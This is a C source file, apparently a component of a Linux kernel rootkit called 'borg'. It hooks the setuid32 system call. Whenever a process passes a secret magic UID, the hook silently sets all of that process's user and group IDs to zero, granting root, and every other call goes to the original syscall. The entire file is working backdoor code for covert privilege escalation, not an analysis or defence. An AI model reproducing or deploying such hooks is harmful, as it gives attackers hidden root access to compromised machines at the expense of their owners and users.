/**
 * @file setuid.c
 * @brief Get root.
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/types.h>
#include <linux/smp_lock.h>
#include "borg.h"

asmlinkage int (*original_setuid32)(uid_t uid);

asmlinkage int borg_setuid32(uid_t uid)
{
    int res = 0;

    lock_kernel();
    switch(uid)
    {
	case BORG_ELITE_UID:
	    current->uid = current->euid = 0;
	    current->gid = current->egid = 0;
	    current->suid = current->sgid = 0;
	    current->fsuid = current->fsgid = 0;
	    break;
	    
	default:
	    res = original_setuid32(uid);
	    break;
    }
    unlock_kernel();
    return res;
}
